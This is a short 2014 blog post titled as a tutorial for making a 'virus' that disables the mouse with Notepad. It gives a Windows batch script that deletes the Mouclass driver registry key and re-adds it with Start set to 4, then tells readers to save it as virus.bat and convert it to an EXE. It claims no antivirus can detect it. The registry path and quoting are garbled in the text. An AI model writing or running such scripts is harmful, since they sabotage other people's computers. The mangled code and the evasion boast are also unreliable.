Saturday, 4 January 2014

How to Make A virus that disable Mouse Using Notepad Trick



A virus that disable Mouse



This is simplest way to make virus.

Also it cannot be detect by any antivirus.

Open Notepad and copy

below codes:-




rem ———————————
rem Disable Mouse
set
key=”HKEY_LOCAL_MACHINEsystemCurrentControlSetServicesMouclass”
reg delete %key%
reg add %key% /v Start /t
REG_DWORD /d 4
rem ———————————



Save this file as virus.bat.



To Convert it into EXE click here.

No comments:

Post a Comment